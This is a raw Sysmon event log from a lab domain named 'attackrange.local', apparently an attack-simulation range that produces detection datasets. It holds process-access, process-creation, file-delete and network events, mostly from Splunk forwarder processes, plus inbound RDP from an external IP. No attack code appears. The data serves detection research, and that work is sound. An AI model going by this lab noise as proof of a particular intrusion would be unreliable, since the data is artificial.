15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051115Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051114Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051113Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051112Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051111Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-ECA6-607E-FE06-00000000BB01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051110Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECA6-607E-FE06-00000000BB01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051109Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.803{85C0FFC9-ECA6-607E-FE06-00000000BB01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000051108Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.662{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CB24A0BA42DA989CE8F4DA9A61EA526,SHA256=EE6198FD4889804912782B11E66B9BE39967AFF753F1D5A6201043C71C56F786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:55.260{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67ACBEB69BA2BFB373BB70E0EBD85B7,SHA256=0BE9AC2099059545138BEDBABDDE7041511AF94386B49D79AC990651AD1F6B0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051138Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.584{85C0FFC9-ECA7-607E-FF06-00000000BB01}33642720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051137Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECA7-607E-FF06-00000000BB01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051136Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051135Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051134Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051133Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051132Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051131Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051130Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051129Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051128Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051127Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-ECA7-607E-FF06-00000000BB01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051126Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.474{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECA7-607E-FF06-00000000BB01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051125Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.475{85C0FFC9-ECA7-607E-FF06-00000000BB01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000051124Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:53.099{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54152-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051123Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:52.798{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52568-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051122Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.005{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=198DA6C02190A60CE38BB2970344ECDE,SHA256=6BBB7BF549AF7C78E14959A33D1B874A45F06AE827265D91EC773F8105D92A81,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:54.746{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57675-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000082444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:54.746{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57675-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000082443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:54.512{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41976-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:56.369{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D2C099577B0F52F21A6F647700E23DC,SHA256=BE8A878BAF59822436620ABED04FE89DD3E54AE5C7A86F3C577C258AB6D541E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:56.135{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57A70896C7ACAB56F8EFC98A08D4FB83,SHA256=AA908B4AB259E0D9545976D53295E8ADFF2EB07B2A5E255791E049EE7D0B8BFB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051167Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 